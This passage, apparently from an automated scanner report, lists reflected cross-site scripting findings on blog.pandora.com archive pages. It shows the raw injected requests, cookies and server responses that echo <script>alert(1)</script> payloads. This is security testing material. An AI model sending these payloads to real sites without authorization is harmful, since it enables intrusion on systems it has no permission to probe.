Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p>
...[SNIP]...

3.62. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p>
...[SNIP]...

3.63. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p>
...[SNIP]...

3.64. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p>
...[SNIP]...

3.65. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p>
...[SNIP]...

3.66. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p>
...[SNIP]...

3.67. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p>
...[SNIP]...

3.68. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p>
...[SNIP]...

3.69. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p>
...[SNIP]...

3.70. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p>
...[SNIP]...

3.71. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p>
...[SNIP]...

3.72. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p>
...[SNIP]...

3.73. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p>
...[SNIP]...

3.74. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p>
...[SNIP]...

3.75. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p>
...[SNIP]...

3.76. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p>
...[SNIP]...

3.77. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p>
...[SNIP]...

3.78. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
